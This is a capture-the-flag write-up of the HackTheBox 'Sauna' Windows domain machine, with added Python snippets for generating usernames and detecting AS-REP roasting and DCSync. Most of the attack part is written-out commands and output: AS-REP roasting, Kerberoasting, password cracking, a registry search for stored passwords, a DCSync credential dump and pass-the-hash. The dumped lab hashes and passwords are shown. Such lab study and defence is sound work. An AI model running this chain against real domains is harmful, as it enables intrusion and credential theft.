# Sauna

`ldap` `kerberos` `reg` `bloodhound`

* Machine name: Sauna
* Difficulty: Easy
* OS: Windows - AD

## Enumeration

### NMAP

```
Nmap scan report for 10.10.10.175
Host is up (0.037s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-11 00:08:49Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
```

### LDAP

```
┌──(kali㉿kali)-[~/htb]
└─$ ldapsearch -x -H ldap://10.10.10.175 -D '' -w '' -b "DC=EGOTISTICAL-BANK,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# EGOTISTICAL-BANK.LOCAL

{...}

# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

# search reference
ref: ldap://ForestDnsZones.EGOTISTICAL-BANK.LOCAL/DC=ForestDnsZones,DC=EGOTIST
 ICAL-BANK,DC=LOCAL

# search reference
ref: ldap://DomainDnsZones.EGOTISTICAL-BANK.LOCAL/DC=DomainDnsZones,DC=EGOTIST
 ICAL-BANK,DC=LOCAL

# search reference
ref: ldap://EGOTISTICAL-BANK.LOCAL/CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOC
 AL

# search result
search: 2
result: 0 Success

# numResponses: 19
# numEntries: 15
# numReferences: 3

```

We found a user: hugo smith. We will build a list of possible usernames (for example just the first letter of the first name followed by the last name, with or without a dot, and so on) and then test it with kerbrute.

```
┌──(kali㉿kali)-[~/htb/sauna]
└─$ /home/kali/kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 user.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/10/24 - Ronnie Flathers @ropnop

2024/11/10 12:17:13 >  Using KDC(s):
2024/11/10 12:17:13 >  	10.10.10.175:88

2024/11/10 12:17:13 >  [+] VALID USERNAME:	 hsmith@EGOTISTICAL-BANK.LOCAL
2024/11/10 12:17:13 >  Done! Tested 5 usernames (1 valid) in 0.149 seconds
```

It exists!

We could not exploit it, so we look for other usernames. Enumerating the web pages turns up several.

```
fergus smith
shaun coins
bowie taylor
sophie driver
hugo bear
steven kerb
```

We can use this Python script:

{% embed url="https://github.com/mohinparamasivam/AD-Username-Generator/blob/master/username-generate.py" %}

or build the list by hand, since we know the accounts are made of the first letter of the first name followed by the last name.
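
As an added example (not the linked script and not part of the original writeup), a small Python generator for the patterns described above, seeded with the names found on the website; the convention confirmed on this box (first initial + last name) comes first, the other variants are assumptions:

```python
# Added example: build candidate usernames from "first last" names so the
# list can be fed to kerbrute or GetNPUsers. The first pattern is the one
# this box uses; the others are common variants (assumed, not confirmed here).

# Constructed input: the names listed above plus the LDAP hit.
NAMES = [
    "hugo smith",
    "fergus smith",
    "shaun coins",
    "bowie taylor",
    "sophie driver",
    "hugo bear",
    "steven kerb",
]


def candidates(full_name: str) -> list[str]:
    """Return username guesses for one 'first last' name, most likely first."""
    parts = full_name.lower().split()
    if len(parts) < 2:
        return parts                 # single token: use it as-is
    first, last = parts[0], parts[-1]
    guesses = [
        first[0] + last,             # hsmith  (the convention seen on this box)
        first + "." + last,          # hugo.smith
        first + last,                # hugosmith
        first[0] + "." + last,       # h.smith
        first + "." + last[0],       # hugo.s
        last + first[0],             # smithh
        first,                       # hugo
    ]
    return list(dict.fromkeys(guesses))   # drop duplicates, keep order


def build_wordlist(names=NAMES) -> list[str]:
    """Flatten and de-duplicate the candidates for the whole list of names."""
    seen: dict[str, None] = {}
    for name in names:
        for guess in candidates(name):
            seen.setdefault(guess, None)
    return list(seen)


if __name__ == "__main__":
    # One guess per line, the format kerbrute and GetNPUsers expect.
    with open("users.txt", "w") as fh:
        fh.write("\n".join(build_wordlist()) + "\n")
```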

```
┌──(kali㉿kali)-[~/htb]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -usersfile users.txt -format hashcat -outputfile hashes.txt 
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:63e114dda5dc307223ab101c621539ea${...}
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
```

We got a hash!
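
GetNPUsers only returns a hash for accounts whose userAccountControl has the "Do not require Kerberos preauthentication" bit set (UF_DONT_REQUIRE_PREAUTH, 0x400000), which is why fsmith answered and the others did not. As an added example (not part of the original writeup), the check a defender can run with the same attribute; the sample entries are constructed:

```python
# Added example: find AS-REP roastable accounts from their userAccountControl
# value, the same condition GetNPUsers relies on. Sample entries are made up.

UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000      # 4194304 decimal

# Equivalent LDAP filter (bitwise-AND matching rule) to run against the DC.
LDAP_FILTER = (
    "(&(objectCategory=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

# Constructed sample of what ldapsearch would return; the flag values are
# illustrative, not the real values from the box.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "FSmith",  "userAccountControl": 0x400200},  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    {"sAMAccountName": "HSmith",  "userAccountControl": 0x200},     # NORMAL_ACCOUNT only
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202},  # roastable but disabled
]


def asrep_roastable(entries, include_disabled=False):
    """Return sAMAccountNames that would answer an AS-REQ without preauth.

    Disabled accounts are skipped by default: the KDC rejects logons for
    them, so they are not an immediate exposure, but the flag should still
    be cleared when the account is re-enabled.
    """
    hits = []
    for entry in entries:
        uac = int(entry["userAccountControl"])
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(entry["sAMAccountName"])
    return hits


if __name__ == "__main__":
    print("LDAP filter:", LDAP_FILTER)
    for name in asrep_roastable(SAMPLE_ENTRIES):
        print(f"[!] {name}: clear 'Do not require Kerberos preauthentication'")
```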

## Initial access

```
┌──(kali㉿kali)-[~/htb]
└─$ john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)     
1g 0:00:00:09 DONE (2024-11-10 12:43) 0.1075g/s 1133Kp/s 1133Kc/s 1133KC/s Thomas30..TheLost18
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

We have the password of user fsmith. We connect over WinRM.

```
┌──(kali㉿kali)-[~/htb]
└─$ evil-winrm -u fsmith -p Thestrokes23 -i 10.10.10.175  
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>
```

## Privilege escalation

We enumerate with BloodHound.

```
┌──(kali㉿kali)-[~/htb/sauna]
└─$ nxc ldap EGOTISTICAL-BANK.LOCAL -u fsmith -p Thestrokes23 --bloodhound --collection All --dns-server 10.10.10.175
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.175    389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
LDAP        10.10.10.175    389    SAUNA            Resolved collection methods: acl, session, dcom, localadmin, trusts, container, group, rdp, objectprops, psremote
LDAP        10.10.10.175    389    SAUNA            Done in 00M 08S
LDAP        10.10.10.175    389    SAUNA            Compressing output into /home/kali/.nxc/logs/SAUNA_10.10.10.175_2024-11-10_124811_bloodhound.zip
```

hsmith, found at the start, turns out to be Kerberoastable:

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FgKLkL3e3pDQbRGvdkS1n%2Ff244dae052cca3e69dd707b8c0acafcd.png?alt=media&#x26;token=a4a166aa-9dd3-453d-9859-7b32ae5dc462" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~/htb/sauna]
└─$ impacket-GetUserSPNs EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -request
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 00:54:34.140321  <never>               



[-] CCache file is not found. Skipping...
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$b8a0b3a0f6df5c08234056b0a715e5fd${...}
```

```
┌──(kali㉿kali)-[~/htb/sauna]
└─$ john hsmith.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     (?)     
1g 0:00:00:03 DONE (2024-11-10 12:54) 0.3257g/s 3433Kp/s 3433Kc/s 3433KC/s Thomas30..TheLost18
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

We end up with the same password.

We leave BloodHound and go back to the WinRM session. Our goal is to pivot to svc\_loanmgr: it has DCSync rights, which will let us dump the Administrator hash.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FrQSKvXg1CAoePhtAFN0m%2F84c96f655674243089020e750d3d0e90.png?alt=media&#x26;token=dc20c8db-c6c4-4d6b-8960-0ade9b3e9a44" alt=""><figcaption></figcaption></figure>

```
*Evil-WinRM* PS C:\> reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415}
    (Default)    REG_SZ    Picture Password Enrollment UX

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2135f72a-90b5-4ed3-a7f1-8bb705ac276a}
    (Default)    REG_SZ    PicturePasswordLogonProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{24954E9B-D39A-4168-A3B2-E5014C94492F}
    (Default)    REG_SZ    OOBE Upgrade Password Page

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29EA1611-529B-4113-8EE3-EE0F6DD2C715}
    (Default)    REG_SZ    RASGCW Change Password Class

{...}

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{d9162b5b-ca81-476e-a310-cb32d932733c}
    (Default)    REG_SZ    Password Expired UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
    FilterIn    REG_SZ    FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask

```

`DefaultPassword REG_SZ Moneymakestheworldgoround!`

We try it for svc\_loanmgr and bingo!

All that is left is to dump the admin hash...

```
┌──(kali㉿kali)-[~/htb/sauna]
└─$ impacket-secretsdump svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175  
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7229816c65b8d9efd10055c2b6a4c6b2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:6f6ae06144ad16166c839625f8bc87eb799927d2cdc2b034b6696115069ee1f1
SAUNA$:aes128-cts-hmac-sha1-96:bd635396b8e727b9fa0417344b43a706
SAUNA$:des-cbc-md5:1a9d133bb0b920e9
[*] Cleaning up... 
```
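
The secretsdump run above is a DCSync: the DRSUAPI replication call is logged on the DC as Security event 4662 with the replication control-access GUIDs in the Properties field (Audit Directory Service Access must be enabled). As an added example (not part of the original writeup), a check that flags any principal other than a domain controller exercising those rights; the list of allowed replicators and the sample events are constructed:

```python
# Added example: detect DCSync from Windows Security event 4662. Replication
# shows up as a directory-service access whose Properties carry the
# replication extended-right GUIDs; only DC machine accounts (and, where
# present, the Azure AD Connect account) should ever use them.

REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals allowed to replicate: the DC machine account(s). Assumption for
# this example; fill it from the Domain Controllers OU in a real deployment.
ALLOWED_REPLICATORS = {"EGOTISTICAL-BANK\\SAUNA$"}

# Constructed 4662 events, reduced to the fields the check needs.
EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "SAUNA$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "svc_loanmgr",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "FSmith",
     "Properties": "{e48d0154-bcf8-11d1-8702-00c04fb96050}"},  # ordinary attribute read
]


def dcsync_alerts(events, allowed=ALLOWED_REPLICATORS):
    """Return (account, [right names]) for non-DC principals using replication rights."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        guids = [g.strip("{}").lower() for g in ev["Properties"].split()]
        rights = [REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS]
        if not rights:
            continue
        who = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
        if who not in allowed:
            alerts.append((who, rights))
    return alerts


if __name__ == "__main__":
    for account, rights in dcsync_alerts(EVENTS):
        print(f"[!] possible DCSync by {account}: {', '.join(rights)}")
```

The same principal should also be reviewed in the domain object's ACL: a user like svc_loanmgr needs these rights removed, not just monitored.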

```
┌──(kali㉿kali)-[~/htb/sauna]
└─$ evil-winrm -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```
